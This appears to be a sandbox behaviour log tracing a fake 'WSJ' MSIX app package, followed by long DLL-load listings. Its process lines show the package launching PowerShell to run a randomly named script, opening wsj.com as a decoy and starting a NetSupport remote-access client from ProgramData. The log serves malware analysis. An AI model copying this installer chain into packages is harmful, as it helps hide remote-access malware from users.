Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Process created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe "PsfRunDll64.exe"	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.wsj.com/	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\ProgramData\netsupport\client\client32.exe "C:\ProgramData\netsupport\client\client32.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=404 --field-trial-handle=1996,i,16757572502617297566,4553058767684910018,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Process created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe "PsfRunDll64.exe"
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1

Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: concrt140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.ui.xaml.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.storage.applicationdata.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: rometadata.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.applicationmodel.background.systemeventsbroker.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: biwinrt.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: mrmcorer.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.staterepositoryclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: bcp47mrm.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: msvcp140_app.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140_1_app.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140_app.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.ui.xaml.controls.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: uiamanager.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.ui.core.textinput.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: winrttracing.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.applicationmodel.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.globalization.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: directmanipulation.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: daxexec.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: fltlib.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: container.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: profext.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: appcontracts.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: cdprt.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: appxpackaging.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: cryptxml.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: webservices.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: cryptowinrt.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: certenroll.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dsparse.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: threadpoolwinrt.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: ninput.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.networking.connectivity.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: installservice.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: rometadata.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: windows.storage.applicationdata.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: appcontracts.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: windows.applicationmodel.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: cdprt.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: capauthz.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: ondemandbrokerclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: psfruntime64.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
